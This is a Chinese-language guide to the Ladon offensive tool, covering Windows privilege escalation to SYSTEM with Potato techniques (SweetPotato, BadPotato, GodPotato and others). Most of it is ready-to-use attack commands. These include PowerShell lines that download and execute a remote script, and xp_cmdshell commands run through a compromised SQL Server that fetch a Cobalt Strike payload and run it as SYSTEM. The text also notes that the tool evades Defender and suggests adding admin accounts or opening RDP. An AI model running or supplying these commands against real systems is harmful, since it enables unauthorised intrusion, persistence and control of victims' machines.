+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer
>= Ladon 7.2.0
Update: 20200810
通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。
1 本地NTLM中继获取SYSTEM令牌
2 SeImpersonatePrivilege特权
测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。如下方”Win7管理员提权至SYSTEM“图片上部分就是USER部分的Potato提权失败,下方是管理员权限,而其它环境都是IIS权限。所以为了方便Ladon默认也显示当前用户SeImpersonatePrivilege特权情况。
SweetPotato集成了原版Potato和JulyPotato的功能,包含DCOM/WINRM/PrintSpoofer方法获取SYSTEM。
1 | Load SweetPotato |
pipePotato:一种新型的通用提权漏洞,PrintSpoofer是一个利用打印机PIPE提权的方法,国人写了个工具叫BadPotato。
1 | Load BadPotato |
1 Win7 IIS 应用池用户权限
2 Win7 本地管理员用户权限
3 Win2012 IIS 应用池权限
4 Win7 本地服务用户权限
5 Win8 本地服务用户权限
PS:由于BadPotato不支持WIN7系统,所以以上环境主要以测试SweetPotato为主。
本地服务用户权限下直接以SYSTEM权限上控Cobalt Strike
http://k8gege.org/p/6b9b3afe.html
Ladon >= 12.2
1 | Ladon BadPotato cmdline |
1 | Ladon SweetPotato cmdline |
1 | Ladon EfsPotato whoami |
1 | Ladon McpPotato whoami |
1 | Ladon GodPotato whoami |
1 | Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr |
1 | powershell Import-Module .\Ladon.ps1;Ladon GodPotato whoami |
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1');Ladon GodPotato whoami |
http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html
Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]
网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
执行SQL查询权限为network service
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""' |
1 | exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat' |
可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""' |
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"' |
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""' |
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases